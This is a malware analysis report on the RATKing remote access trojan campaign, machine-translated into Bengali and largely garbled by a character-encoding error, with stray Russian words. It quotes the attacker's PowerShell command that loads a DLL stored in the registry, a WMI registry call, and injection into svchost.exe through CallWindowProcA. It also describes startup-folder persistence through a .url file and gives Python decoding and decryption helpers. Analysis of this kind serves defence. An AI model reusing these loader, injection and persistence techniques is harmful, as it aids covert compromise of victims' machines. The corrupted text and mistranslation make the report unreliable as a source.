deobfuscation āĻ…ā§āĻ¯āĻžāĻ˛āĻ—āĻ°āĻŋāĻĻāĻŽ āĻŦā§‡āĻļ āĻ¸āĻšāĻœ: āĻĒā§āĻ°āĻ¤āĻŋ āĻ¤ā§ƒāĻ¤ā§€āĻ¯āĻŧ āĻ…āĻ•ā§āĻˇāĻ°āĻ•ā§‡ āĻ…āĻ¸ā§āĻĒāĻˇā§āĻŸ āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚ āĻĨā§‡āĻ•ā§‡ āĻŦāĻžāĻĻ āĻĻā§‡āĻ“āĻ¯āĻŧāĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛, āĻ¯āĻžāĻ° āĻĒāĻ°ā§‡ āĻĢāĻ˛āĻžāĻĢāĻ˛āĻŸāĻŋ āĻŦā§‡āĻ¸ 16 āĻĨā§‡āĻ•ā§‡ āĻŽā§‚āĻ˛ āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚āĻ¯āĻŧā§‡ āĻĄāĻŋāĻ•ā§‹āĻĄ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤ āĻ‰āĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§‚āĻĒ, āĻŽāĻžāĻ¨ āĻĨā§‡āĻ•ā§‡ 57Q53s63t72s69J70r74e2El53v68m65j6CH6Ct (āĻ‰āĻĒāĻ°ā§‡āĻ° āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡ āĻšāĻžāĻ‡āĻ˛āĻžāĻ‡āĻŸ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡) āĻĢāĻ˛āĻ¸ā§āĻŦāĻ°ā§‚āĻĒ āĻ˛āĻžāĻ‡āĻ¨āĻŸāĻŋ āĻ›āĻŋāĻ˛ WScript.Shell.

āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚ āĻĄāĻŋāĻ…āĻĢāĻ¸āĻ•ā§‡āĻŸ āĻ•āĻ°āĻ¤ā§‡, āĻ†āĻŽāĻ°āĻž āĻĒāĻžāĻ‡āĻĨāĻ¨ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋ:

def decode_str(data_enc):   
    return binascii.unhexlify(''.join([data_enc[i:i+2] for i in range(0, len(data_enc), 3)]))

āĻ¨ā§€āĻšā§‡, 9-10 āĻ˛āĻžāĻ‡āĻ¨ā§‡, āĻ†āĻŽāĻ°āĻž āĻ¸ā§‡āĻ‡ āĻŽāĻžāĻ¨āĻŸāĻŋāĻ•ā§‡ āĻšāĻžāĻ‡āĻ˛āĻžāĻ‡āĻŸ āĻ•āĻ°āĻŋ āĻ¯āĻžāĻ° āĻĄāĻŋāĻ…āĻĢāĻ¸āĻ•ā§‡āĻļāĻ¨ā§‡āĻ° āĻĢāĻ˛ā§‡ āĻāĻ•āĻŸāĻŋ DLL āĻĢāĻžāĻ‡āĻ˛ āĻ¤ā§ˆāĻ°āĻŋ āĻšāĻ¯āĻŧā§‡āĻ›ā§‡ā§ˇ āĻ¤āĻŋāĻ¨āĻŋāĻ‡ āĻĒāĻžāĻ“āĻ¯āĻŧāĻžāĻ°āĻļā§‡āĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻĒāĻ°āĻŦāĻ°ā§āĻ¤ā§€ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§‡ āĻšāĻžāĻ˛ā§ āĻ•āĻ°ā§‡āĻ›āĻŋāĻ˛ā§‡āĻ¨āĨ¤

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻ…āĻ¸ā§āĻĒāĻˇā§āĻŸ DLL āĻ¸āĻš āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚

VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸā§‡āĻ° āĻĒā§āĻ°āĻ¤āĻŋāĻŸāĻŋ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻš āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻ•āĻžāĻ°āĻŖ āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚āĻ—ā§āĻ˛āĻŋ āĻĄāĻŋāĻ…āĻĢāĻ¸āĻ•ā§‡āĻŸ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤

āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻšāĻžāĻ˛āĻžāĻ¨ā§‹āĻ° āĻĒāĻ°ā§‡, āĻĢāĻžāĻ‚āĻļāĻ¨āĻŸāĻŋ āĻ•āĻ˛ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ wscript.sleep - āĻāĻŸāĻŋ āĻ¸ā§āĻĨāĻ—āĻŋāĻ¤ āĻŽā§ƒāĻ¤ā§āĻ¯ā§āĻĻāĻ¨ā§āĻĄ āĻ¸āĻžā§āĻšāĻžāĻ˛āĻ¨ āĻ•āĻ°āĻ¤ā§‡ āĻŦā§āĻ¯āĻŦāĻšā§ƒāĻ¤ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤

āĻāĻ°āĻĒāĻ°ā§‡, āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸāĻŸāĻŋ āĻ‰āĻ‡āĻ¨ā§āĻĄā§‹āĻœ āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋāĻ° āĻ¸āĻžāĻĨā§‡ āĻ•āĻžāĻœ āĻ•āĻ°ā§‡āĨ¤ āĻāĻ° āĻœāĻ¨ā§āĻ¯ āĻ¤āĻŋāĻ¨āĻŋ WMI āĻĒā§āĻ°āĻ¯ā§āĻ•ā§āĻ¤āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›ā§‡āĻ¨āĨ¤ āĻāĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ā§‡, āĻāĻ•āĻŸāĻŋ āĻ…āĻ¨āĻ¨ā§āĻ¯ āĻ•ā§€ āĻ¤ā§ˆāĻ°āĻŋ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛, āĻāĻŦāĻ‚ āĻāĻ•ā§āĻ¸āĻŋāĻ•āĻŋāĻ‰āĻŸā§‡āĻŦāĻ˛ āĻĢāĻžāĻ‡āĻ˛ā§‡āĻ° āĻŽā§‚āĻ˛ āĻ…āĻ‚āĻļāĻŸāĻŋ āĻ¤āĻžāĻ° āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ°ā§‡ āĻ˛ā§‡āĻ–āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻ•āĻŽāĻžāĻ¨ā§āĻĄāĻŸāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ WMI āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§‡ āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛:

GetObject(winmgmts {impersonationLevel=impersonate}!\.rootdefault:StdRegProv)

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻāĻ•āĻŸāĻŋ āĻ­āĻŋāĻŦāĻŋāĻāĻ¸ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋāĻ¤ā§‡ āĻ•āĻ°āĻž āĻāĻ•āĻŸāĻŋ āĻāĻ¨ā§āĻŸā§āĻ°āĻŋ

āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧ 3. DLL āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋāĻ° āĻ…āĻĒāĻžāĻ°ā§‡āĻļāĻ¨

āĻ¤ā§ƒāĻ¤ā§€āĻ¯āĻŧ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§‡, āĻĻā§‚āĻˇāĻŋāĻ¤ DLL āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄ āĻ˛ā§‹āĻĄ āĻ•āĻ°ā§‡, āĻāĻŸāĻŋ āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻĻā§‡āĻ¯āĻŧ āĻāĻŦāĻ‚ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻ•āĻžāĻ°ā§€ āĻ˛āĻ— āĻ‡āĻ¨ āĻ•āĻ°āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ¸ā§āĻŦāĻ¯āĻŧāĻ‚āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻ­āĻžāĻŦā§‡ āĻšāĻžāĻ˛ā§ āĻšāĻ¯āĻŧ āĻ¤āĻž āĻ¨āĻŋāĻļā§āĻšāĻŋāĻ¤ āĻ•āĻ°ā§‡āĨ¤

PowerShell āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§‡ āĻšāĻžāĻ˛āĻžāĻ¨

PowerShell āĻ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ DLL āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻŋāĻ¤ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛:

[System.Threading.Thread]::GetDomain().Load((ItemProperty HKCU:///Software///<rnd_sub_key_name> ).<rnd_value_name>);
[GUyyvmzVhebFCw]::EhwwK('WScript.ScriptFullName', 'rWZlgEtiZr', 'WScript.ScriptName'),0

āĻāĻ‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻ•āĻžāĻœ āĻ•āĻ°ā§‡āĻ›ā§‡:

  • āĻ¨āĻžāĻŽā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋ āĻŽāĻžāĻ¨ āĻ¤āĻĨā§āĻ¯ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ rnd_value_name — āĻāĻ‡ āĻĄā§‡āĻŸāĻž .Net āĻĒā§āĻ˛ā§āĻ¯āĻžāĻŸāĻĢāĻ°ā§āĻŽā§‡ āĻ˛ā§‡āĻ–āĻž āĻāĻ•āĻŸāĻŋ DLL āĻĢāĻžāĻ‡āĻ˛ āĻ›āĻŋāĻ˛;
  • āĻĒā§āĻ°āĻ¸ā§‡āĻ¸ āĻŽā§‡āĻŽāĻ°āĻŋāĻ¤ā§‡ āĻĢāĻ˛ā§‡ .Net āĻŽāĻĄāĻŋāĻ‰āĻ˛ āĻ˛ā§‹āĻĄ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡ powershell.exe āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ [System.Threading.Thread]::GetDomain().Load() (Load() āĻĢāĻžāĻ‚āĻļāĻ¨ā§‡āĻ° āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤ āĻŦāĻŋāĻŦāĻ°āĻŖ Microsoft āĻ“āĻ¯āĻŧā§‡āĻŦāĻ¸āĻžāĻ‡āĻŸā§‡ āĻ‰āĻĒāĻ˛āĻŦā§āĻ§);
  • āĻĢāĻžāĻ‚āĻļāĻ¨ āĻ¸āĻžā§āĻšāĻžāĻ˛āĻŋāĻ¤ GUyyvmzVhebFCw]::EhwwK() - āĻĄāĻŋāĻāĻ˛āĻāĻ˛ āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋāĻ° āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻ¨ āĻāĻŸāĻŋāĻ° āĻ¸āĻžāĻĨā§‡ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ - āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋ āĻ¸āĻš vbsScriptPath, xorKey, vbsScriptName. āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ° xorKey āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄ āĻāĻŦāĻ‚ āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋ āĻĄāĻŋāĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻ•ā§€ āĻ¸āĻ‚āĻ°āĻ•ā§āĻˇāĻŖ āĻ•āĻ°ā§‡ vbsScriptPath Đ¸ vbsScriptName āĻ…āĻŸā§‹āĻ°āĻžāĻ¨ā§‡ āĻāĻ•āĻŸāĻŋ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻ¨ āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻ¸ā§āĻĨāĻžāĻ¨āĻžāĻ¨ā§āĻ¤āĻ° āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤

DLL āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋāĻ° āĻŦāĻŋāĻŦāĻ°āĻŖ

āĻĄāĻŋāĻ•āĻŽā§āĻĒāĻžāĻ‡āĻ˛ āĻ•āĻ°āĻž āĻ†āĻ•āĻžāĻ°ā§‡, āĻŦā§āĻŸāĻ˛ā§‹āĻĄāĻžāĻ°āĻŸāĻŋ āĻĻā§‡āĻ–āĻ¤ā§‡ āĻāĻ‡āĻ°āĻ•āĻŽ āĻ›āĻŋāĻ˛:

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻĄāĻŋāĻ•āĻŽā§āĻĒāĻžāĻ‡āĻ˛āĻĄ āĻ†āĻ•āĻžāĻ°ā§‡ āĻ˛ā§‹āĻĄāĻžāĻ° (āĻ¯ā§‡ āĻĢāĻžāĻ‚āĻļāĻ¨āĻŸāĻŋ āĻĻāĻŋāĻ¯āĻŧā§‡ DLL āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋāĻ° āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻ¨ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻ˛āĻžāĻ˛ āĻ°āĻ™ā§‡ āĻ†āĻ¨ā§āĻĄāĻžāĻ°āĻ˛āĻžāĻ‡āĻ¨ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡)

āĻŦā§āĻŸāĻ˛ā§‹āĻĄāĻžāĻ°āĻŸāĻŋ .āĻ¨ā§‡āĻŸ āĻ°āĻŋāĻ…ā§āĻ¯āĻžāĻ•ā§āĻŸāĻ° āĻĒā§āĻ°āĻŸā§‡āĻ•ā§āĻŸāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸ā§āĻ°āĻ•ā§āĻˇāĻŋāĻ¤āĨ¤ de4dot āĻ‡āĻ‰āĻŸāĻŋāĻ˛āĻŋāĻŸāĻŋ āĻāĻ‡ āĻ°āĻ•ā§āĻˇāĻ• āĻ…āĻĒāĻ¸āĻžāĻ°āĻŖ āĻāĻ•āĻŸāĻŋ āĻšāĻŽā§ŽāĻ•āĻžāĻ° āĻ•āĻžāĻœ āĻ•āĻ°ā§‡.

āĻāĻ‡ āĻ˛ā§‹āĻĄāĻžāĻ°:

  • āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ āĻĒā§‡āĻ˛ā§‹āĻĄ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻ•āĻ°ā§‡ (āĻāĻ‡ āĻ‰āĻĻāĻžāĻšāĻ°āĻŖā§‡ āĻāĻŸāĻŋ svchost.exe);
  • āĻ†āĻŽāĻŋ āĻ…āĻŸā§‹āĻ°āĻžāĻ¨ā§‡ āĻāĻ•āĻŸāĻŋ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ¯ā§‹āĻ— āĻ•āĻ°ā§‡āĻ›āĻŋāĨ¤

āĻĒā§‡āĻ˛ā§‹āĻĄ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨

PowerShell āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ¯ā§‡ āĻĢāĻžāĻ‚āĻļāĻ¨āĻ•ā§‡ āĻ•āĻ˛ āĻ•āĻ°ā§‡āĻ›ā§‡ āĻ¤āĻž āĻĻā§‡āĻ–āĻž āĻ¯āĻžāĻ•āĨ¤

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻĒāĻžāĻ“āĻ¯āĻŧāĻžāĻ°āĻļā§‡āĻ˛ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻĻā§āĻŦāĻžāĻ°āĻž āĻĄāĻžāĻ•āĻž āĻĢāĻžāĻ‚āĻļāĻ¨

āĻāĻ‡ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻ•āĻ°ā§āĻŽ āĻ¸āĻžā§āĻšāĻžāĻ˛āĻŋāĻ¤:

  • āĻĻā§āĻŸāĻŋ āĻĄā§‡āĻŸāĻž āĻ¸ā§‡āĻŸ āĻĄāĻŋāĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ•āĻ°āĻž (array и array2 āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡)āĨ¤ āĻāĻ—ā§āĻ˛āĻŋ āĻŽā§‚āĻ˛āĻ¤ āĻœāĻŋāĻœāĻŋāĻĒ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻ¸āĻ‚āĻ•ā§āĻšāĻŋāĻ¤ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻāĻŦāĻ‚ āĻ•ā§€ āĻ¸āĻš XOR āĻ…ā§āĻ¯āĻžāĻ˛āĻ—āĻ°āĻŋāĻĻāĻŽ āĻĻāĻŋāĻ¯āĻŧā§‡ āĻāĻ¨āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ xorKey;
  • āĻŦāĻ°āĻžāĻĻā§āĻĻāĻ•ā§ƒāĻ¤ āĻŽā§‡āĻŽāĻ°āĻŋ āĻāĻ˛āĻžāĻ•āĻžāĻ¯āĻŧ āĻĄā§‡āĻŸāĻž āĻ…āĻ¨ā§āĻ˛āĻŋāĻĒāĻŋ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡āĨ¤ āĻ¤āĻĨā§āĻ¯ āĻĨā§‡āĻ•ā§‡ array - āĻŽā§‡āĻŽāĻ°āĻŋ āĻāĻ˛āĻžāĻ•āĻžāĻ¯āĻŧ āĻ¨āĻŋāĻ°ā§āĻĻā§‡āĻļāĻŋāĻ¤ intPtr (payload pointer āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡); āĻ¤āĻĨā§āĻ¯ āĻĨā§‡āĻ•ā§‡ array2 - āĻŽā§‡āĻŽāĻ°āĻŋ āĻāĻ˛āĻžāĻ•āĻžāĻ¯āĻŧ āĻ¨āĻŋāĻ°ā§āĻĻā§‡āĻļāĻŋāĻ¤ intPtr2 (shellcode pointer āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡);
  • āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦāĻ˛āĻž āĻšāĻ¯āĻŧ CallWindowProcA (āĻŦāĻŋāĻŦāĻ°āĻŖ āĻāĻ‡ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŽāĻžāĻ‡āĻ•ā§āĻ°ā§‹āĻ¸āĻĢā§āĻŸ āĻ“āĻ¯āĻŧā§‡āĻŦāĻ¸āĻžāĻ‡āĻŸā§‡ āĻ‰āĻĒāĻ˛āĻŦā§āĻ§) āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋāĻ—ā§āĻ˛āĻŋāĻ° āĻ¸āĻžāĻĨā§‡ (āĻĒāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ°āĻ—ā§āĻ˛āĻŋāĻ° āĻ¨āĻžāĻŽāĻ—ā§āĻ˛āĻŋ āĻ¨ā§€āĻšā§‡ āĻ¤āĻžāĻ˛āĻŋāĻ•āĻžāĻ­ā§āĻ•ā§āĻ¤ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡, āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡ āĻ¸ā§‡āĻ—ā§āĻ˛āĻŋ āĻāĻ•āĻ‡ āĻ•ā§āĻ°āĻŽā§‡, āĻ¤āĻŦā§‡ āĻ•āĻžāĻœā§‡āĻ° āĻŽāĻžāĻ¨ āĻ¸āĻš):
    • lpPrevWndFunc - āĻĨā§‡āĻ•ā§‡ āĻĄā§‡āĻŸāĻž āĻĒāĻ¯āĻŧā§‡āĻ¨ā§āĻŸāĻžāĻ° array2;
    • hWnd â€” āĻāĻ•ā§āĻ¸āĻŋāĻ•āĻŋāĻ‰āĻŸā§‡āĻŦāĻ˛ āĻĢāĻžāĻ‡āĻ˛ā§‡āĻ° āĻĒāĻžāĻĨ āĻ§āĻžāĻ°āĻŖāĻ•āĻžāĻ°ā§€ āĻāĻ•āĻŸāĻŋ āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚-āĻ āĻĒāĻ¯āĻŧā§‡āĻ¨ā§āĻŸāĻžāĻ° svchost.exe;
    • Msg - āĻĨā§‡āĻ•ā§‡ āĻĄā§‡āĻŸāĻž āĻĒāĻ¯āĻŧā§‡āĻ¨ā§āĻŸāĻžāĻ° array;
    • wParamlParam â€” āĻŦāĻžāĻ°ā§āĻ¤āĻž āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋ (āĻāĻ‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡, āĻāĻ‡ āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋāĻ—ā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻž āĻšāĻ¯āĻŧāĻ¨āĻŋ āĻāĻŦāĻ‚ 0 āĻāĻ° āĻŽāĻžāĻ¨ āĻ›āĻŋāĻ˛);
  • āĻāĻ•āĻŸāĻŋ āĻĢāĻžāĻ‡āĻ˛ āĻ¤ā§ˆāĻ°āĻŋ āĻ•āĻ°ā§‡āĻ›ā§‡āĻ¨ %AppData%MicrosoftWindowsStart MenuProgramsStartup<name>.urlāĻ¯ā§‡āĻ–āĻžāĻ¨ā§‡ <name> - āĻāĻ‡ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ°ā§‡āĻ° āĻĒā§āĻ°āĻĨāĻŽ 4āĻŸāĻŋ āĻ…āĻ•ā§āĻˇāĻ° vbsScriptName (āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡, āĻāĻ‡ āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¸āĻš āĻ•ā§‹āĻĄā§‡āĻ° āĻ–āĻŖā§āĻĄāĻŸāĻŋ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻĻāĻŋāĻ¯āĻŧā§‡ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧ File.Copy) āĻāĻ‡āĻ­āĻžāĻŦā§‡, āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻ•āĻžāĻ°ā§€ āĻ˛āĻ— āĻ‡āĻ¨ āĻ•āĻ°āĻ˛ā§‡ āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻŸāĻŋ āĻ…āĻŸā§‹āĻ°āĻžāĻ¨ āĻĢāĻžāĻ‡āĻ˛ā§‡āĻ° āĻ¤āĻžāĻ˛āĻŋāĻ•āĻžāĻ¯āĻŧ āĻāĻ•āĻŸāĻŋ URL āĻĢāĻžāĻ‡āĻ˛ āĻ¯ā§āĻ•ā§āĻ¤ āĻ•āĻ°ā§‡ āĻāĻŦāĻ‚ āĻāĻ‡āĻ­āĻžāĻŦā§‡ āĻ¸āĻ‚āĻ•ā§āĻ°āĻžāĻŽāĻŋāĻ¤ āĻ•āĻŽā§āĻĒāĻŋāĻ‰āĻŸāĻžāĻ°ā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻ¸āĻ‚āĻ¯ā§āĻ•ā§āĻ¤ āĻšāĻ¯āĻŧā§‡ āĻ¯āĻžāĻ¯āĻŧāĨ¤ URL āĻĢāĻžāĻ‡āĻ˛āĻŸāĻŋāĻ¤ā§‡ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻ˛āĻŋāĻ™ā§āĻ• āĻ°āĻ¯āĻŧā§‡āĻ›ā§‡:

[InternetShortcut]
URL = file : ///<vbsScriptPath>

āĻ•ā§€āĻ­āĻžāĻŦā§‡ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨āĻŸāĻŋ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻ¤āĻž āĻŦā§‹āĻāĻžāĻ° āĻœāĻ¨ā§āĻ¯, āĻ†āĻŽāĻ°āĻž āĻĄā§‡āĻŸāĻž āĻ…ā§āĻ¯āĻžāĻ°ā§‡āĻ—ā§āĻ˛āĻŋāĻ•ā§‡ āĻĄāĻŋāĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ•āĻ°ā§‡āĻ›āĻŋ array и array2. āĻāĻŸāĻŋ āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻ†āĻŽāĻ°āĻž āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻĒāĻžāĻ‡āĻĨāĻ¨ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋ:

def decrypt(data, key):
    return gzip.decompress(
        bytearray([data[i] ^ key[i % len(key)] for i in range(len(data))])[4:])

